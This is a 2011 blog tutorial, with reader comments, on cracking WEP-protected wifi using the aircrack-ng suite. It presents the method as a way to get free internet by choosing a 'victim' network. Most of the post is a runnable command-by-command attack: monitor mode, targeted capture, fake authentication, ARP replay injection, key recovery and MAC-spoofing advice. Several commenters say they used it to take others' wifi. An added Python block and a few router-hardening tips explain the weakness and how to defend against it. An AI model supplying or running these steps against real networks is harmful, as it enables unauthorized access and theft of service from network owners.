Wednesday, April 20, 2011

Hacking Wifi WEP

Finally, something you guys have all been waiting for. A lot of people complain to me, "How do I get free internet?" Well, the answer is, "there is no such thing as free internet". However, many people in New York City use wifi, and many of the people who use wifi aren't using a good enough security method. They choose to use WEP encryption, but WEP has some major flaws in its design. With these flaws, someone can easily "hack" it and get their wifi password. Here's how:

*I'm assuming that you will be using BT4 R2 for this tutorial

We open the WICD Network Manager to search for any nearby networks that use WEP encryption. The Access Point signal strength should be around 50% or better, or else we can't inject.

1. Start by opening the terminal. We are going to be using Aircrack, Aireplay, Airmon, and Airodump.

Airmon - helps set your wireless card into monitor mode
Airodump - helps us capture packets from a wireless router (AP)
Aireplay - helps us forge ARP requests
Aircrack - recovers WEP keys from the captured packets

2. We start by setting our wireless card into monitor mode. We want to type this into the terminal:

"airmon-ng start 'your wireless interface'"
note: to see your wireless interface, type "ifconfig -a" into the terminal and look for the wireless one

in my case:
"airmon-ng start wlan0"

3. Now we are going to start sniffing around for some traffic:

"airodump-ng 'interface'"

in my case:
"airodump-ng mon0"

4. We should see some wireless traffic nearby. Once we get enough traffic, we press CTRL+C to stop capturing all the wireless traffic. Now we choose a victim who has used a poorly secured wifi. In this tutorial we want to choose someone who is using WEP encryption. We are going to want to write down the BSSID and channel. Now we type into the terminal:

"airodump-ng -c 'channel' --bssid 'BSSID' -w 'filename' 'interface'"

in my case:
"airodump-ng -c 6 --bssid 00:12:0E:4E:58:62 -w wep mon0"

5. Now we are going to open a new terminal. In the new terminal we are going to type:

"aireplay-ng -1 1 -a 'BSSID' 'interface'"
note: if you see a smiley face, that means you have a successful fake authentication. If not, you may be too far from the access point to fake authentication, or your MAC is being ignored. You can change your MAC with the macchanger tool.

in my case:
"aireplay-ng -1 1 -a 00:12:0E:4E:58:62 mon0"

6. Now, to speed up the process, open a new terminal and type:

"aireplay-ng -3 -b 'BSSID' 'interface'"

in my case:
"aireplay-ng -3 -b 00:12:0E:4E:58:62 mon0"

7. Now go back to the terminal from step 4 (the one that monitors the traffic) and under the DATA column, make sure you have at least 10,000 data packets. You may need more than 10,000 data packets, but just keep trying at every 5,000 packet interval. Now, in a new terminal, type:

"aircrack-ng 'filename-number.cap'"

in my case:
"aircrack-ng wep-01.cap"

If you get a failed message and it asks you to try again after receiving 5,000 more packets, press CTRL+C to stop aircrack. Then run the same command again after 5,000 more packets have been captured to reattempt the crack.

The password will have semicolons in it, but just take away the semicolons and that is the password. All this can be done in less than 5 minutes, showing you how weak and flawed WEP encryption is.
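As an added illustration (not part of the original post), here is the design flaw behind that weakness: WEP keys each frame with a 24-bit IV prepended to the shared key, so IVs repeat after a few thousand frames and any two frames sharing an IV share an RC4 keystream. The key, IV and payloads below are constructed sample values.

```python
# Added illustration (not from the original post): why WEP's design is weak.
# Each frame is RC4-encrypted under (24-bit IV || shared key); the IV travels
# in clear and repeats quickly, and two frames with the same IV share a
# keystream, so C1 XOR C2 == P1 XOR P2. Key, IV and payloads are constructed.
import math

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key scheduling, then keystream generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: clear 3-byte IV + RC4(IV||key) XOR payload (ICV omitted)."""
    return iv + xor_bytes(payload, rc4_keystream(iv + shared_key, len(payload)))

def leaked_plaintext_xor(frame1: bytes, frame2: bytes):
    """Same IV => same keystream => C1 XOR C2 == P1 XOR P2; None if IVs differ."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])

def frames_for_likely_iv_repeat(n_ivs: int = 1 << 24) -> int:
    """Birthday bound: frames needed for a 50% chance that a random IV repeats."""
    return math.ceil(math.sqrt(2 * n_ivs * math.log(2)))

def demo():
    key = bytes.fromhex("0123456789")      # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"                   # constructed IV that gets reused
    p1 = b"GET /index.html HTTP/1.1"       # constructed, known plaintext
    p2 = b"POST /login pass=hunter2"       # constructed, same length as p1
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    leak = leaked_plaintext_xor(c1, c2)    # keystream cancels out
    recovered = xor_bytes(leak, p1)        # knowing p1 exposes p2, no key needed
    return recovered == p2, frames_for_likely_iv_repeat()
```

The second value returned by demo() (under 5,000 frames for a likely IV collision) is why a busy WEP network hands out reusable keystream so quickly; WPA/WPA2 use per-frame keys derived from a much larger nonce space and do not have this problem.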

Things to know:
1. To secure your home or work WiFi, you should use WPA encryption with a strong password consisting of lower and upper case letters, numbers and symbols.
2. Use MAC authentication to secure your router from unwanted users. Keep in mind that a MAC address can be changed with a tool like macchanger (see step 5), so this only helps alongside WPA, not instead of it.
3. It helps if you set your BSSID to invisible so your Access Point becomes less of a target.

Note: To access your router's settings, open your web browser, type in "192.168.1.1" and hit enter.

Comment and Subscribe/Follow. And make sure to tell your friends and family to secure their wireless network.

12 comments:

  1. This actually works! It took me all night but now I can have four bars of free wifi.

  2. What about WPA2, do you have instructions?

  3. @anonymous read my firefox portable post and the comment there. Also, if you read my post "to all hacking hamster members", you would understand my situation. Anyways, I will soon post instructions on how to hack your WPA2 network's key.

  4. Ok, I admit... you've made me a true believer lol. I can hardly wait to read your next blog. These tutorials are so awesome. Thank you.

  5. I only have WPA. When will u teach us??

  6. The final command, aircrack-ng filename-number.cap

    What number do I fill in...?? Where do I get that number....??

  7. Screw that, I found out... it totally worked, man... can't wait for your WPA guide...

  8. Hey, sometimes I have this issue... sometimes I am able to hack the passwords... but sometimes after typing in

    airodump-ng -c 6 --bssid 00:12:0E:4E:58:62 -w wep mon0

    the data column never ever rises... it stays at zero. Why is that?

  9. @Kenneth Dave
    Sometimes you may be too far away from the access point to receive any data or even to inject packets. Also, maybe the router doesn't recognize your MAC, so it ignores you. Those may be some reasons why you can't get the data in the data column. Another possible reason: are you on the right channel?

  10. I only have WPA, is that the same?

  11. Helen, WPA is not easy to crack; you need WEP only. When using aircrack, those that are unsure about the file name can just drag the .cap or .ivs file into the new terminal window and hit enter.

  12. I'm going to work on WPA as soon as I have time. It is a lot harder to crack but it is possible.
